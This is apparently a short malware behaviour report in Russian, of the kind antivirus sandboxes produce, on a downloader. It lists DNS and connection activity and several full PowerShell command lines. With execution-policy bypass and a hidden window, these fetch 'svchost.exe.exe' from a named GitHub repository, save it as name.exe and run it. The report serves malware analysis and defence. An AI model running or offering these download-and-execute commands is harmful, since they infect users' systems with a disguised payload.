Техническая информация
- Загружает файл https://github.com/radikruster/newchecker/raw/master/svchost.exe.exe и сохраняет его как name.exe
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object System.Net.WebClient).DownloadFile('https://github.com/radikruster/newchecker/raw/master/svchost.exe.exe','name.exe')
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')